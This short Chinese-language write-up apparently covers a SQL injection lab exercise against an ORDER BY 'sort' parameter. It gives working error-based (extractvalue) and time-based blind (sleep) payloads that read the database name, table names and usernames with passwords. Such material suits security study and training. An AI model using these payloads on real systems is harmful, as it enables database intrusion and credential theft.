分别尝试用:
?sort=1
?sort=2
?sort=3
从而发现使用 sort=1 时 表格以第一列进行排列,sort=2 时 表格以第二列进行排列, sort=3 时 表格以第三列进行排序。从而猜测可能是与 order by 函数相关。
暴库
?sort=(extractvalue(1,concat(0x7e,(select database()),0x7e)))#
时间注入
?sort=1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)
?sort=1 and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',sleep(5),0)